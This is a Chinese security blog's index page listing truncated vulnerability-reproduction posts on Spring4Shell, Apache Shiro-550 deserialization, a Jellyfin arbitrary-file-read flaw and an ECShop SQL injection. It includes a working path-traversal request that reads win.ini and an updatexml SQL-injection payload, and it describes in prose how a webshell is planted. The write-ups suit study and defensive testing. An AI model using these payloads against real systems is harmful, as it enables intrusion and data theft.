TypechoJoeTheme

学习使用

统计
登录
用户名
密码
搜索到 6 篇与 的结果 ———
2022-03-31

Spring Rce CVE-2022-22965

Spring Rce CVE-2022-22965
漏洞介绍继2021年底由阿里发现的Log4j的严重漏洞之后, Spring框架也被发现了一个重大的安全漏洞。目前这个漏洞的名称被称为“SpringShell: Spring Core RCE 0-day Vulnerability”。漏洞版本JDK 9及以上版本 使用Tomcat 服务器 以war 部署运行 使用了spring-webmvc或 spring-webflux Spring框架版本是 5.3.0 到 5.3.17, 5.2.0 到 5.2.19,以及更旧的版本。原理Spring MVC 框架的参数绑定功能提供了将请求中的参数绑定控制器方法中参数对象的成员变量,攻击者通过构造恶意请求获取 AccessLogValve 对象并注恶意字段值触发 pipeline 机制可写任意路径下的文件。利用步骤覆盖 Tomcat 特定的ClassLoader属性,将访问日志文件路径更改为 web根目录下的某个位置,并将日志模式(写入的数据)更改为包含 webshel​​l 代码的常量模式。这会导致JSP_webshel​​l被放到web 根目录下。向写入的 webshel​​l 发送查询...
admin
2022-03-31

漏洞复现

1,845 阅读
0 评论
2022年03月31日
1,845 阅读
0 评论
2022-03-11

apache shiro-550

apache shiro-550
漏洞详情shiro反序列化原因是shiro的一个机制为了让浏览器或服务器重启后不丢失用户的登陆状态,会将用户信息保存到 rememberMe字段中 然后发送到服务端,服务端再对它进行base64解密,aes解密,再进行反序列化,由于在 1.2.4 这个版本里 shiro的key是固定的,所以可以通过构造一段恶意类经过aes加密再base64加密然后放到 rememberMe 伪造cookie信息,来让服务端加载,进而触发反序列化漏洞详细步骤:1.首先正常登录,然后生成带有rememberme的返回cookie值。2.生成cookie,shiro会提供rememberme功能,可以通过cookie记录登录用户,从而记录登录用户的身份认证信息,即下次无需登录即可访问。处理rememberme的cookie的类为org.apache.shiro.web.mgt.CookieRememberMeManager3.之后进入serialize,对登录认证信息进行序列化4.然后加密,调用aes算法。5.加密结束,然后在在org/apache/shiro/web/mgt/CookieRememb...
admin
2022-03-11

漏洞复现

1,311 阅读
0 评论
2022年03月11日
1,311 阅读
0 评论
2022-02-17

jellyfin-任意文件读取 漏洞复现

jellyfin-任意文件读取 漏洞复现
可以通过访问http:///Audio/anything/hls/<文件路径>/stream.mp3/http:///Audio/anything/hls/<文件路径>/stream.aac/读取任意文件。影响版本:Jellyfin<10.7.1漏洞复现:利用POC:GET /Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.aac/ HTTP/1.1 Host: 127.0.0.1:8096 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh...
admin
2022-02-17

漏洞复现

789 阅读
0 评论
2022年02月17日
789 阅读
0 评论
2022-02-03

ecshop-sql注入漏洞

ecshop-sql注入漏洞
安装环境https://vulhub.org/#/environments/ecshop/collection_list-sqli/docker-compose up -d配置环境http://192.168.0.128:8080/install/index.php漏洞测试以普通用户身份登录,打开个人收藏页面进行抓包。http://192.168.0.128:8080/user.php?act=collection_list正常包修改X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:"user_id";s:38:"0'-(updatexml(1,repeat(user(),2),1))-'";s:7:"payment";s:1:"4";}|45ea207d7a2b68c49582d2d22adf953aX-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953apay_...
admin
2022-02-03

漏洞复现

631 阅读
0 评论
2022年02月03日
631 阅读
0 评论